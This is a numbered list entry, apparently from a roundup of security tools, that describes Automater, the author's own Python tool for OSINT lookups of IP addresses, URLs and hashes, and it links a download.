  15. Automater is a tool that I originally created to automate the OSINT analysis of IP addresses. It quickly grew and became a tool to do analysis of IP Addresses, URLs, and Hashes. Unfortunately though, this was my first Python project and I made a lot of mistakes, and as the project grew it became VERY hard for me to maintain. Download: https://github.com/1aN0rmus/TekDefense-Automater